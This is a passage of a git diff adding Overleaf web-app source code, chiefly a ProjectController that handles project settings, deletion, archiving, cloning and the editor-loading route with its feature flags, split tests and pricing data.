+    const query = {
+      _id: projectId,
+      collabratecUsers: {
+        $elemMatch: {
+          user_id: userId,
+        },
+      },
+    }
+    const project = await Project.findOne(query, { _id: 1 }).exec()
+    return project != null
+  },
+
+  async linkCollabratecUserProject(projectId, userId, collabratecDocumentId) {
+    projectId = new ObjectId(projectId)
+    userId = new ObjectId(userId)
+
+    const query = {
+      _id: projectId,
+      collabratecUsers: {
+        $not: {
+          $elemMatch: {
+            collabratec_document_id: collabratecDocumentId,
+            user_id: userId,
+          },
+        },
+      },
+    }
+    const update = {
+      $push: {
+        collabratecUsers: {
+          collabratec_document_id: collabratecDocumentId,
+          user_id: userId,
+        },
+      },
+    }
+    return await Project.updateOne(query, update).exec()
+  },
+
+  async setCollabratecUsers(projectId, collabratecUsers) {
+    projectId = new ObjectId(projectId)
+
+    if (!Array.isArray(collabratecUsers)) {
+      throw new Error('collabratec_users must be array')
+    }
+
+    for (const collabratecUser of collabratecUsers) {
+      collabratecUser.user_id = new ObjectId(collabratecUser.user_id)
+    }
+
+    const update = { $set: { collabratecUsers } }
+    return await Project.updateOne({ _id: projectId }, update).exec()
+  },
+
+  async unlinkCollabratecUserProject(projectId, userId) {
+    projectId = new ObjectId(projectId)
+    userId = new ObjectId(userId)
+
+    const query = { _id: projectId }
+    const update = {
+      $pull: {
+        collabratecUsers: {
+          user_id: userId,
+        },
+      },
+    }
+    await Project.updateOne(query, update).exec()
+  },
+}
+
+module.exports = {
+  ...callbackifyAll(ProjectCollabratecDetailsHandler),
+  promises: ProjectCollabratecDetailsHandler,
+}
diff --git a/services/web/app/src/Features/Project/ProjectController.js b/services/web/app/src/Features/Project/ProjectController.js
new file mode 100644
index 0000000..5a01df5
--- /dev/null
+++ b/services/web/app/src/Features/Project/ProjectController.js
@@ -0,0 +1,1264 @@
+const _ = require('lodash')
+const OError = require('@overleaf/o-error')
+const crypto = require('crypto')
+const { setTimeout } = require('timers/promises')
+const pProps = require('p-props')
+const logger = require('@overleaf/logger')
+const { expressify } = require('@overleaf/promise-utils')
+const { ObjectId } = require('mongodb-legacy')
+const ProjectDeleter = require('./ProjectDeleter')
+const ProjectDuplicator = require('./ProjectDuplicator')
+const ProjectCreationHandler = require('./ProjectCreationHandler')
+const EditorController = require('../Editor/EditorController')
+const ProjectHelper = require('./ProjectHelper')
+const metrics = require('@overleaf/metrics')
+const { User } = require('../../models/User')
+const SubscriptionLocator = require('../Subscription/SubscriptionLocator')
+const LimitationsManager = require('../Subscription/LimitationsManager')
+const FeaturesHelper = require('../Subscription/FeaturesHelper')
+const Settings = require('@overleaf/settings')
+const AuthorizationManager = require('../Authorization/AuthorizationManager')
+const InactiveProjectManager = require('../InactiveData/InactiveProjectManager')
+const ProjectUpdateHandler = require('./ProjectUpdateHandler')
+const ProjectGetter = require('./ProjectGetter')
+const PrivilegeLevels = require('../Authorization/PrivilegeLevels')
+const SessionManager = require('../Authentication/SessionManager')
+const Sources = require('../Authorization/Sources')
+const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler')
+const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter')
+const ProjectEntityHandler = require('./ProjectEntityHandler')
+const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher')
+const Features = require('../../infrastructure/Features')
+const BrandVariationsHandler = require('../BrandVariations/BrandVariationsHandler')
+const UserController = require('../User/UserController')
+const AnalyticsManager = require('../Analytics/AnalyticsManager')
+const SplitTestHandler = require('../SplitTests/SplitTestHandler')
+const SplitTestSessionHandler = require('../SplitTests/SplitTestSessionHandler')
+const FeaturesUpdater = require('../Subscription/FeaturesUpdater')
+const SpellingHandler = require('../Spelling/SpellingHandler')
+const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper')
+const InstitutionsFeatures = require('../Institutions/InstitutionsFeatures')
+const InstitutionsGetter = require('../Institutions/InstitutionsGetter')
+const ProjectAuditLogHandler = require('./ProjectAuditLogHandler')
+const PublicAccessLevels = require('../Authorization/PublicAccessLevels')
+const TagsHandler = require('../Tags/TagsHandler')
+const TutorialHandler = require('../Tutorial/TutorialHandler')
+const OnboardingDataCollectionManager = require('../OnboardingDataCollection/OnboardingDataCollectionManager')
+const UserUpdater = require('../User/UserUpdater')
+const Modules = require('../../infrastructure/Modules')
+const UserGetter = require('../User/UserGetter')
+const {
+  isStandaloneAiAddOnPlanCode,
+} = require('../Subscription/PaymentProviderEntities')
+const SubscriptionController = require('../Subscription/SubscriptionController.js')
+const { formatCurrency } = require('../../util/currency')
+
+/**
+ * @import { GetProjectsRequest, GetProjectsResponse, Project } from "./types"
+ */
+
+const _ProjectController = {
+  _isInPercentageRollout(rolloutName, objectId, percentage) {
+    if (Settings.bypassPercentageRollouts === true) {
+      return true
+    }
+    const data = `${rolloutName}:${objectId.toString()}`
+    const md5hash = crypto.createHash('md5').update(data).digest('hex')
+    const counter = parseInt(md5hash.slice(26, 32), 16)
+    return counter % 100 < percentage
+  },
+
+  async updateProjectSettings(req, res) {
+    const projectId = req.params.Project_id
+
+    if (req.body.compiler != null) {
+      await EditorController.promises.setCompiler(projectId, req.body.compiler)
+    }
+
+    if (req.body.imageName != null) {
+      await EditorController.promises.setImageName(
+        projectId,
+        req.body.imageName
+      )
+    }
+
+    if (req.body.name != null) {
+      await EditorController.promises.renameProject(projectId, req.body.name)
+    }
+
+    if (req.body.spellCheckLanguage != null) {
+      await EditorController.promises.setSpellCheckLanguage(
+        projectId,
+        req.body.spellCheckLanguage
+      )
+    }
+
+    if (req.body.rootDocId != null) {
+      await EditorController.promises.setRootDoc(projectId, req.body.rootDocId)
+    }
+
+    if (req.body.mainBibliographyDocId != null) {
+      await EditorController.promises.setMainBibliographyDoc(
+        projectId,
+        req.body.mainBibliographyDocId
+      )
+    }
+
+    res.sendStatus(204)
+  },
+
+  async updateProjectAdminSettings(req, res) {
+    const projectId = req.params.Project_id
+    const user = SessionManager.getSessionUser(req.session)
+    const publicAccessLevel = req.body.publicAccessLevel
+    const publicAccessLevels = [
+      PublicAccessLevels.READ_ONLY,
+      PublicAccessLevels.READ_AND_WRITE,
+      PublicAccessLevels.PRIVATE,
+      PublicAccessLevels.TOKEN_BASED,
+    ]
+
+    if (
+      req.body.publicAccessLevel != null &&
+      publicAccessLevels.includes(publicAccessLevel)
+    ) {
+      await EditorController.promises.setPublicAccessLevel(
+        projectId,
+        req.body.publicAccessLevel
+      )
+
+      await ProjectAuditLogHandler.promises.addEntry(
+        projectId,
+        'toggle-access-level',
+        user._id,
+        req.ip,
+        { publicAccessLevel: req.body.publicAccessLevel, status: 'OK' }
+      )
+      res.sendStatus(204)
+    } else {
+      res.sendStatus(500)
+    }
+  },

+  async deleteProject(req, res) {
+    const projectId = req.params.Project_id
+    const user = SessionManager.getSessionUser(req.session)
+    await ProjectDeleter.promises.deleteProject(projectId, {
+      deleterUser: user,
+      ipAddress: req.ip,
+    })
+
+    res.sendStatus(200)
+  },
+
+  async archiveProject(req, res) {
+    const projectId = req.params.Project_id
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    await ProjectDeleter.promises.archiveProject(projectId, userId)
+    res.sendStatus(200)
+  },
+
+  async unarchiveProject(req, res) {
+    const projectId = req.params.Project_id
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    await ProjectDeleter.promises.unarchiveProject(projectId, userId)
+    res.sendStatus(200)
+  },
+
+  async trashProject(req, res) {
+    const projectId = req.params.project_id
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    await ProjectDeleter.promises.trashProject(projectId, userId)
+    res.sendStatus(200)
+  },
+
+  async untrashProject(req, res) {
+    const projectId = req.params.project_id
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    await ProjectDeleter.promises.untrashProject(projectId, userId)
+    res.sendStatus(200)
+  },
+
+  async expireDeletedProjectsAfterDuration(_req, res) {
+    await ProjectDeleter.promises.expireDeletedProjectsAfterDuration()
+    res.sendStatus(200)
+  },
+
+  async expireDeletedProject(req, res) {
+    const { projectId } = req.params
+    await ProjectDeleter.promises.expireDeletedProject(projectId)
+    res.sendStatus(200)
+  },
+
+  async restoreProject(req, res) {
+    const projectId = req.params.Project_id
+    await ProjectDeleter.promises.restoreProject(projectId)
+    res.sendStatus(200)
+  },
+
+  async cloneProject(req, res, next) {
+    res.setTimeout(5 * 60 * 1000) // allow extra time for the copy to complete
+    metrics.inc('cloned-project')
+    const projectId = req.params.Project_id
+    const { projectName, tags } = req.body
+    logger.debug({ projectId, projectName }, 'cloning project')
+    if (!SessionManager.isUserLoggedIn(req.session)) {
+      return res.json({ redir: '/register' })
+    }
+    const currentUser = SessionManager.getSessionUser(req.session)
+    const { first_name: firstName, last_name: lastName, email } = currentUser
+    try {
+      const project = await ProjectDuplicator.promises.duplicate(
+        currentUser,
+        projectId,
+        projectName,
+        tags
+      )
+      res.json({
+        name: project.name,
+        lastUpdated: project.lastUpdated,
+        project_id: project._id,
+        owner_ref: project.owner_ref,
+        owner: {
+          first_name: firstName,
+          last_name: lastName,
+          email,
+          _id: currentUser._id,
+        },
+      })
+    } catch (err) {
+      OError.tag(err, 'error cloning project', {
+        projectId,
+        userId: currentUser._id,
+      })
+      return next(err)
+    }
+  },
+
+  async newProject(req, res) {
+    const currentUser = SessionManager.getSessionUser(req.session)
+    const {
+      first_name: firstName,
+      last_name: lastName,
+      email,
+      _id: userId,
+    } = currentUser
+    const projectName =
+      req.body.projectName != null ? req.body.projectName.trim() : undefined
+    const { template } = req.body
+
+    const project = await (template === 'example'
+      ? ProjectCreationHandler.promises.createExampleProject(
+          userId,
+          projectName
+        )
+      : ProjectCreationHandler.promises.createBasicProject(userId, projectName))
+
+    res.json({
+      project_id: project._id,
+      owner_ref: project.owner_ref,
+      owner: {
+        first_name: firstName,
+        last_name: lastName,
+        email,
+        _id: userId,
+      },
+    })
+  },
+
+  async renameProject(req, res) {
+    const projectId = req.params.Project_id
+    const newName = req.body.newProjectName
+    await EditorController.promises.renameProject(projectId, newName)
+    res.sendStatus(200)
+  },
+
+  async userProjectsJson(req, res) {
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    let projects = await ProjectGetter.promises.findAllUsersProjects(
+      userId,
+      'name lastUpdated publicAccesLevel archived trashed owner_ref'
+    )
+
+    // _buildProjectList already converts archived/trashed to booleans so isArchivedOrTrashed should not be used here
+    projects = ProjectController._buildProjectList(projects, userId)
+      .filter(p => !(p.archived || p.trashed))
+      .map(p => ({ _id: p.id, name: p.name, accessLevel: p.accessLevel }))
+
+    res.json({ projects })
+  },
+
+  async projectEntitiesJson(req, res) {
+    const projectId = req.params.Project_id
+    const project = await ProjectGetter.promises.getProject(projectId)
+
+    const { docs, files } =
+      ProjectEntityHandler.getAllEntitiesFromProject(project)
+    const entities = docs
+      .concat(files)
+      // Sort by path ascending
+      .sort((a, b) => (a.path > b.path ? 1 : a.path < b.path ? -1 : 0))
+      .map(e => ({
+        path: e.path,
+        type: e.doc != null ? 'doc' : 'file',
+      }))
+    res.json({ project_id: projectId, entities })
+  },
+
+  async loadEditor(req, res, next) {
+    const timer = new metrics.Timer('load-editor')
+    if (!Settings.editorIsOpen) {
+      return res.render('general/closed', { title: 'updating_site' })
+    }
+
+    let anonymous, userId, sessionUser
+    if (SessionManager.isUserLoggedIn(req.session)) {
+      sessionUser = SessionManager.getSessionUser(req.session)
+      userId = SessionManager.getLoggedInUserId(req.session)
+      anonymous = false
+    } else {
+      sessionUser = null
+      anonymous = true
+      userId = null
+    }
+
+    const projectId = req.params.Project_id
+
+    // should not be used in place of split tests query param overrides (?my-split-test-name=my-variant)
+    function shouldDisplayFeature(name, variantFlag) {
+      if (req.query && req.query[name]) {
+        return req.query[name] === 'true'
+      } else {
+        return variantFlag === true
+      }
+    }
+
+    const splitTests = [
+      'compile-log-events',
+      'external-socket-heartbeat',
+      'full-project-search',
+      'null-test-share-modal',
+      'fall-back-to-clsi-cache',
+      'initial-compile-from-clsi-cache',
+      'pdf-caching-cached-url-lookup',
+      'pdf-caching-mode',
+      'pdf-caching-prefetch-large',
+      'pdf-caching-prefetching',
+      'revert-file',
+      'revert-project',
+      !anonymous && 'ro-mirror-on-client',
+      'track-pdf-download',
+      !anonymous && 'writefull-oauth-promotion',
+      'hotjar',
+      'reviewer-role',
+      'editor-redesign',
+      'paywall-change-compile-timeout',
+      'overleaf-assist-bundle',
+      'wf-feature-rebrand',
+    ].filter(Boolean)
+
+    const getUserValues = async userId =>
+      pProps(
+        _.mapValues({
+          user: (async () => {
+            const user = await User.findById(
+              userId,
+              'email first_name last_name referal_id signUpDate featureSwitches features featuresEpoch refProviders alphaProgram betaProgram isAdmin ace labsProgram labsExperiments completedTutorials writefull aiErrorAssistant'
+            ).exec()
+            // Handle case of deleted user
+            if (!user) {
+              UserController.logout(req, res, next)
+              return
+            }
+            logger.debug({ projectId, userId }, 'got user')
+            return FeaturesUpdater.featuresEpochIsCurrent(user)
+              ? user
+              : await ProjectController._refreshFeatures(req, user)
+          })(),
+          learnedWords: SpellingHandler.promises.getUserDictionary(userId),
+          projectTags: TagsHandler.promises.getTagsForProject(
+            userId,
+            projectId
+          ),
+          userHasInstitutionLicence: InstitutionsFeatures.promises
+            .hasLicence(userId)
+            .catch(err => {
+              logger.error({ err, userId }, 'failed to get institution licence')
+              return false
+            }),
+          affiliations: InstitutionsGetter.promises
+            .getCurrentAffiliations(userId)
+            .catch(err => {
+              logger.error({ err, userId }, 'failed to get institution licence')
+              return false
+            }),
+          subscription:
+            SubscriptionLocator.promises.getUsersSubscription(userId),
+          isTokenMember: CollaboratorsGetter.promises.userIsTokenMember(
+            userId,
+            projectId
+          ),
+          isInvitedMember:
+            CollaboratorsGetter.promises.isUserInvitedMemberOfProject(
+              userId,
+              projectId
+            ),
+          odcRole: OnboardingDataCollectionManager.getOnboardingDataValue(
+            userId,
+            'role'
+          ).catch(err => {
+            logger.error({ err, userId })
+            return null
+          }),
+        })
+      )
+    const splitTestAssignments = {}
+
+    try {
+      const responses = await pProps({
+        userValues: userId ? getUserValues(userId) : defaultUserValues(),
+        splitTestAssignments: Promise.all(
+          splitTests.map(async splitTest => {
+            splitTestAssignments[splitTest] =
+              await SplitTestHandler.promises.getAssignment(req, res, splitTest)
+          })
+        ),
+        project: ProjectGetter.promises.getProject(projectId, {
+          name: 1,
+          lastUpdated: 1,
+          track_changes: 1,
+          owner_ref: 1,
+          brandVariationId: 1,
+          overleaf: 1,
+          tokens: 1,
+          tokenAccessReadAndWrite_refs: 1, // used for link sharing analytics
+          collaberator_refs: 1, // used for link sharing analytics
+          pendingEditor_refs: 1, // used for link sharing analytics
+          reviewer_refs: 1,
+        }),
+        userIsMemberOfGroupSubscription: sessionUser
+          ? (async () =>
+              (
+                await LimitationsManager.promises.userIsMemberOfGroupSubscription(
+                  sessionUser
+                )
+              ).isMember)()
+          : false,
+        _flushToTpds:
+          TpdsProjectFlusher.promises.flushProjectToTpdsIfNeeded(projectId),
+        _activate:
+          InactiveProjectManager.promises.reactivateProjectIfRequired(
+            projectId
+          ),
+      })
+
+      const { project, userValues, userIsMemberOfGroupSubscription } = responses
+
+      const {
+        user,
+        learnedWords,
+        projectTags,
+        userHasInstitutionLicence,
+        subscription,
+        isTokenMember,
+        isInvitedMember,
+        odcRole,
+      } = userValues
+
+      const brandVariation = project?.brandVariationId
+        ? await BrandVariationsHandler.promises.getBrandVariationById(
+            project.brandVariationId
+          )
+        : undefined
+
+      const anonRequestToken = TokenAccessHandler.getRequestToken(
+        req,
+        projectId
+      )
+      const allowedImageNames = ProjectHelper.getAllowedImagesForUser(user)
+
+      const privilegeLevel =
+        await AuthorizationManager.promises.getPrivilegeLevelForProject(
+          userId,
+          projectId,
+          anonRequestToken
+        )
+
+      const reviewerRoleAssignment =
+        await SplitTestHandler.promises.getAssignmentForUser(
+          project.owner_ref,
+          'reviewer-role'
+        )
+
+      await Modules.promises.hooks.fire('enforceCollaboratorLimit', projectId)
+      if (isTokenMember) {
+        // Check explicitly that the user is in the read write token refs. While this
+        // could be inferred from the privilege level, the privilege level of token
+        // members might later be restricted.
+        const isReadWriteTokenMember =
+          await CollaboratorsGetter.promises.userIsReadWriteTokenMember(
+            userId,
+            projectId
+          )
+        if (isReadWriteTokenMember) {
+          // Check for an edge case where a user is both in the read write token
+          // access refs and an invited read write member. Ensure they are not
+          // redirected to the sharing updates page.
+          // We could also delete the token access ref if the user is already a member of the project
+          const isInvitedReadWriteMember =
+            await CollaboratorsGetter.promises.isUserInvitedReadWriteMemberOfProject(
+              userId,
+              projectId
+            )
+          if (!isInvitedReadWriteMember) {
+            return res.redirect(`/project/${projectId}/sharing-updates`)
+          }
+        }
+      }
+
+      if (privilegeLevel == null || privilegeLevel === PrivilegeLevels.NONE) {
+        return res.sendStatus(401)
+      }
+
+      const allowedFreeTrial =
+        subscription == null ||
+        isStandaloneAiAddOnPlanCode(subscription.planCode)
+
+      let wsUrl = Settings.wsUrl
+      let metricName = 'load-editor-ws'
+      if (user.betaProgram && Settings.wsUrlBeta !== undefined) {
+        wsUrl = Settings.wsUrlBeta
+        metricName += '-beta'
+      } else if (
+        Settings.wsUrlV2 &&
+        Settings.wsUrlV2Percentage > 0 &&
+        (new ObjectId(projectId).getTimestamp() / 1000) % 100 <
+          Settings.wsUrlV2Percentage
+      ) {
+        wsUrl = Settings.wsUrlV2
+        metricName += '-v2'
+      }
+      if (req.query && req.query.ws === 'fallback') {
+        // `?ws=fallback` will connect to the bare origin, and ignore
Hence it must load the client side + // javascript from there too. + // Not resetting it here would possibly load a socket.io v2 + // client and connect to a v0 endpoint. + wsUrl = undefined + metricName += '-fallback' + } + metrics.inc(metricName) + + // don't need to wait for these to complete + ProjectUpdateHandler.promises + .markAsOpened(projectId) + .catch(err => + logger.error({ err, projectId }, 'failed to mark project as opened') + ) + SplitTestSessionHandler.promises + .sessionMaintenance(req, userId ? user : null) + .catch(err => + logger.error({ err }, 'failed to update split test info in session') + ) + if (userId) { + const ownerFeatures = await UserGetter.promises.getUserFeatures( + project.owner_ref + ) + const planLimit = ownerFeatures?.collaborators || 0 + const namedEditors = project.collaberator_refs?.length || 0 + const pendingEditors = project.pendingEditor_refs?.length || 0 + const exceedAtLimit = planLimit > -1 && namedEditors >= planLimit + + let mode = 'edit' + if (privilegeLevel === PrivilegeLevels.READ_ONLY) { + mode = 'view' + } else if ( + project.track_changes === true || + project.track_changes?.[userId] === true + ) { + mode = 'review' + } + + const projectOpenedSegmentation = { + role: privilegeLevel, + mode, + ownerId: project.owner_ref, + projectId: project._id, + namedEditors, + pendingEditors, + tokenEditors: project.tokenAccessReadAndWrite_refs?.length || 0, + planLimit, + exceedAtLimit, + } + AnalyticsManager.recordEventForUserInBackground( + userId, + 'project-opened', + projectOpenedSegmentation + ) + User.updateOne( + { _id: new ObjectId(userId) }, + { $set: { lastActive: new Date() } } + ) + .exec() + .catch(err => + logger.error( + { err, userId }, + 'failed to update lastActive for user' + ) + ) + } + + const isAdminOrTemplateOwner = + hasAdminAccess(user) || Settings.templates?.user_id === userId + const showTemplatesServerPro = + Features.hasFeature('templates-server-pro') && isAdminOrTemplateOwner + + const debugPdfDetach = shouldDisplayFeature('debug_pdf_detach') + + const detachRole = req.params.detachRole + + const showSymbolPalette = + !Features.hasFeature('saas') || + (user.features && user.features.symbolPalette) + + const userInNonIndividualSub = + userIsMemberOfGroupSubscription || userHasInstitutionLicence + + const userHasPremiumSub = + subscription && !isStandaloneAiAddOnPlanCode(subscription.planCode) + + // Persistent upgrade prompts + // in header & in share project modal + const showUpgradePrompt = + Features.hasFeature('saas') && + userId && + !userHasPremiumSub && + !userInNonIndividualSub + + let aiFeaturesAllowed = false + if (userId && Features.hasFeature('saas')) { + try { + // exit early if the user couldnt use ai anyways, since permissions checks are expensive + const canUserWriteOrReviewProjectContent = + privilegeLevel === PrivilegeLevels.READ_AND_WRITE || + privilegeLevel === PrivilegeLevels.OWNER || + privilegeLevel === PrivilegeLevels.REVIEW + + if (canUserWriteOrReviewProjectContent) { + // check permissions for user and project owner, to see if they allow AI on the project + const permissionsResults = await Modules.promises.hooks.fire( + 'projectAllowsCapability', + project, + userId, + ['use-ai'] + ) + const aiAllowed = permissionsResults.every( + result => result === true + ) + + aiFeaturesAllowed = aiAllowed + } + } catch (err) { + // still allow users to access project if we cant get their permissions, but disable AI feature + aiFeaturesAllowed = false + } + } + + const hasNonRecurlySubscription = + 
+        subscription && !subscription.recurlySubscription_id
+      const hasManuallyCollectedSubscription =
+        subscription?.collectionMethod === 'manual'
+      const canPurchaseAddons = !(
+        hasNonRecurlySubscription || hasManuallyCollectedSubscription
+      )
+      const assistantDisabled = user.aiErrorAssistant?.enabled === false // the assistant has been manually disabled by the user
+      const canUseErrorAssistant =
+        (user.features?.aiErrorAssistant || canPurchaseAddons) &&
+        !assistantDisabled
+
+      let featureUsage = {}
+
+      if (Features.hasFeature('saas')) {
+        const usagesLeft = await Modules.promises.hooks.fire(
+          'remainingFeatureAllocation',
+          userId
+        )
+        usagesLeft?.forEach(usage => {
+          featureUsage = { ...featureUsage, ...usage }
+        })
+      }
+
+      let inEnterpriseCommons = false
+      const affiliations = userValues.affiliations || []
+      for (const affiliation of affiliations) {
+        inEnterpriseCommons =
+          inEnterpriseCommons || affiliation.institution?.enterpriseCommons
+      }
+
+      // Check if a user has never tried Writefull before (writefull.enabled will be null).
+      // If they previously accepted Writefull, or have already been assigned to a trial, user.writefull.enabled will be true;
+      // if they explicitly disabled it, user.writefull.enabled will be false.
+      if (
+        aiFeaturesAllowed &&
+        user.writefull?.enabled === null &&
+        !userIsMemberOfGroupSubscription &&
+        !inEnterpriseCommons
+      ) {
+        const { variant } = await SplitTestHandler.promises.getAssignment(
+          req,
+          res,
+          'writefull-auto-account-creation'
+        )
+
+        if (variant === 'enabled') {
+          await UserUpdater.promises.updateUser(userId, {
+            $set: {
+              writefull: { enabled: true, autoCreatedAccount: true },
+            },
+          })
+          user.writefull.enabled = true
+          user.writefull.autoCreatedAccount = true
+        } else {
+          const { variant } = await SplitTestHandler.promises.getAssignment(
+            req,
+            res,
+            'writefull-auto-load'
+          )
+          if (variant === 'enabled') {
+            await UserUpdater.promises.updateUser(userId, {
+              $set: {
+                writefull: { enabled: true },
+              },
+            })
+            user.writefull.enabled = true
+            user.writefull.firstAutoLoad = true
+          }
+        }
+      }
+
+      const template =
+        detachRole === 'detached'
+          ? 'project/ide-react-detached'
+          : 'project/ide-react'
+
+      let chatEnabled
+      if (Features.hasFeature('saas')) {
+        chatEnabled =
+          Features.hasFeature('chat') && req.capabilitySet.has('chat')
+      } else {
+        chatEnabled = Features.hasFeature('chat')
+      }
+
+      const isOverleafAssistBundleEnabled =
+        splitTestAssignments['overleaf-assist-bundle']?.variant === 'enabled'
+
+      let fullFeatureSet = user?.features
+      if (!anonymous) {
+        // generate the user's feature set, including features added or overridden via modules
+        const moduleFeatures =
+          (await Modules.promises.hooks.fire(
+            'getModuleProvidedFeatures',
+            userId
+          )) || []
+        fullFeatureSet = FeaturesHelper.computeFeatureSet([
+          user.features,
+          ...moduleFeatures,
+        ])
+      }
+
+      const isPaywallChangeCompileTimeoutEnabled =
+        splitTestAssignments['paywall-change-compile-timeout']?.variant ===
+        'enabled'
+
+      const paywallPlans =
+        isPaywallChangeCompileTimeoutEnabled &&
+        (await ProjectController._getPaywallPlansPrices(req, res))
+
+      const customerIoEnabled =
+        await SplitTestHandler.promises.hasUserBeenAssignedToVariant(
+          req,
+          userId,
+          'customer-io-trial-conversion',
+          'enabled',
+          true
+        )
+
+      const addonPrices =
+        isOverleafAssistBundleEnabled &&
+        (await ProjectController._getAddonPrices(req, res))
+
+      let planCode = subscription?.planCode
+      if (!planCode && !userInNonIndividualSub) {
+        planCode = 'personal'
+      }
+
+      const planDetails = Settings.plans.find(p => p.planCode === planCode)
+
+      res.render(template, {
+        title: project.name,
+        priority_title: true,
+        bodyClasses: ['editor'],
+        project_id: project._id,
+        projectName: project.name,
+        user: {
+          id: userId,
+          email: user.email,
+          first_name: user.first_name,
+          last_name: user.last_name,
+          referal_id: user.referal_id,
+          signUpDate: user.signUpDate,
+          allowedFreeTrial,
+          hasRecurlySubscription: subscription?.recurlySubscription_id != null,
+          featureSwitches: user.featureSwitches,
+          features: fullFeatureSet,
+          featureUsage,
+          refProviders: _.mapValues(user.refProviders, Boolean),
+          writefull: {
+            enabled: Boolean(user.writefull?.enabled && aiFeaturesAllowed),
+            autoCreatedAccount: Boolean(user.writefull?.autoCreatedAccount),
+            firstAutoLoad: Boolean(user.writefull?.firstAutoLoad),
+          },
+          alphaProgram: user.alphaProgram,
+          betaProgram: user.betaProgram,
+          labsProgram: user.labsProgram,
+          inactiveTutorials: TutorialHandler.getInactiveTutorials(user),
+          isAdmin: hasAdminAccess(user),
+          planCode,
+          planName: planDetails?.name,
+          isAnnualPlan: planCode && planDetails?.annual,
+          isMemberOfGroupSubscription: userIsMemberOfGroupSubscription,
+          hasInstitutionLicence: userHasInstitutionLicence,
+        },
+        userSettings: {
+          mode: user.ace.mode,
+          editorTheme: user.ace.theme,
+          fontSize: user.ace.fontSize,
+          autoComplete: user.ace.autoComplete,
+          autoPairDelimiters: user.ace.autoPairDelimiters,
+          pdfViewer: user.ace.pdfViewer,
+          syntaxValidation: user.ace.syntaxValidation,
+          fontFamily: user.ace.fontFamily || 'lucida',
+          lineHeight: user.ace.lineHeight || 'normal',
+          overallTheme: user.ace.overallTheme,
+          mathPreview: user.ace.mathPreview,
+          referencesSearchMode: user.ace.referencesSearchMode,
+          enableNewEditor: user.ace.enableNewEditor ?? true,
+        },
+        labsExperiments: user.labsExperiments ??
[], + privilegeLevel, + anonymous, + isTokenMember, + isRestrictedTokenMember: AuthorizationManager.isRestrictedUser( + userId, + privilegeLevel, + isTokenMember, + isInvitedMember + ), + chatEnabled, + projectHistoryBlobsEnabled: Features.hasFeature( + 'project-history-blobs' + ), + roMirrorOnClientNoLocalStorage: + Settings.adminOnlyLogin || project.name.startsWith('Debug: '), + languages: Settings.languages, + learnedWords, + editorThemes: THEME_LIST, + legacyEditorThemes: LEGACY_THEME_LIST, + maxDocLength: Settings.max_doc_length, + maxReconnectGracefullyIntervalMs: + Settings.maxReconnectGracefullyIntervalMs, + brandVariation, + allowedImageNames, + gitBridgePublicBaseUrl: Settings.gitBridgePublicBaseUrl, + gitBridgeEnabled: Features.hasFeature('git-bridge'), + wsUrl, + showSupport: Features.hasFeature('support'), + showTemplatesServerPro, + debugPdfDetach, + showSymbolPalette, + symbolPaletteAvailable: Features.hasFeature('symbol-palette'), + userRestrictions: Array.from(req.userRestrictions || []), + showAiErrorAssistant: aiFeaturesAllowed && canUseErrorAssistant, + detachRole, + metadata: { viewport: false }, + showUpgradePrompt, + fixedSizeDocument: true, + hasTrackChangesFeature: Features.hasFeature('track-changes'), + projectTags, + odcRole: + // only use the ODC role value if the split test is enabled + splitTestAssignments['paywall-change-compile-timeout']?.variant === + 'enabled' + ? odcRole + : null, + isSaas: Features.hasFeature('saas'), + shouldLoadHotjar: splitTestAssignments.hotjar?.variant === 'enabled', + isReviewerRoleEnabled: + reviewerRoleAssignment?.variant === 'enabled' || + Object.keys(project.reviewer_refs || {}).length > 0, + isPaywallChangeCompileTimeoutEnabled, + isOverleafAssistBundleEnabled, + paywallPlans, + customerIoEnabled, + addonPrices, + }) + timer.done() + } catch (err) { + OError.tag(err, 'error getting details for project page') + return next(err) + } + }, + + async _getPaywallPlansPrices( + req, + res, + paywallPlans = ['collaborator', 'student'] + ) { + const plansData = {} + + const locale = req.i18n.language + const { currency } = await SubscriptionController.getRecommendedCurrency( + req, + res + ) + + paywallPlans.forEach(plan => { + const planPrice = Settings.localizedPlanPricing[currency][plan].monthly + const formattedPlanPrice = formatCurrency( + planPrice, + currency, + locale, + true + ) + plansData[plan] = formattedPlanPrice + }) + return plansData + }, + + async _getAddonPrices(req, res, addonPlans = ['assistBundle']) { + const plansData = {} + + const locale = req.i18n.language + const { currency } = await SubscriptionController.getRecommendedCurrency( + req, + res + ) + + addonPlans.forEach(plan => { + const annualPrice = Settings.localizedAddOnsPricing[currency][plan].annual + const monthlyPrice = + Settings.localizedAddOnsPricing[currency][plan].monthly + + plansData[plan] = { + annual: formatCurrency(annualPrice, currency, locale, true), + monthly: formatCurrency(monthlyPrice, currency, locale, true), + } + }) + return plansData + }, + + async _refreshFeatures(req, user) { + // If the feature refresh has failed in this session, don't retry + // it - require the user to log in again. + if (req.session.feature_refresh_failed) { + metrics.inc('features-refresh', 1, { + path: 'load-editor', + status: 'skipped', + }) + return user + } + // If the refresh takes too long then return the current + // features. Note that the user.features property may still be + // updated in the background after the promise is resolved. 
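+    // The block below races a promise-based 5s timer against the refresh and
+    // returns whichever settles first; the AbortController cancels the timer
+    // once the refresh branch finishes. A minimal sketch of the same pattern
+    // (assuming `setTimeout` is the promise-returning version from
+    // 'timers/promises', signature setTimeout(delay, value, options);
+    // `doWork` and `fallbackValue` are illustrative names only):
+    //
+    //   const ac = new AbortController()
+    //   const result = await Promise.race([
+    //     setTimeout(5000, fallbackValue, { signal: ac.signal }),
+    //     doWork().finally(() => ac.abort()),
+    //   ])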
+    const abortController = new AbortController()
+    const refreshTimeoutHandler = async () => {
+      // the signal goes in the options argument so that abort() can cancel the timer
+      await setTimeout(5000, undefined, { signal: abortController.signal })
+      req.session.feature_refresh_failed = {
+        reason: 'timeout',
+        at: new Date(),
+      }
+      metrics.inc('features-refresh', 1, {
+        path: 'load-editor',
+        status: 'timeout',
+      })
+      return user
+    }
+
+    // try to refresh user features now
+    const timer = new metrics.Timer('features-refresh-on-load-editor')
+
+    return Promise.race([
+      refreshTimeoutHandler(),
+      (async () => {
+        try {
+          user.features = await FeaturesUpdater.promises.refreshFeatures(
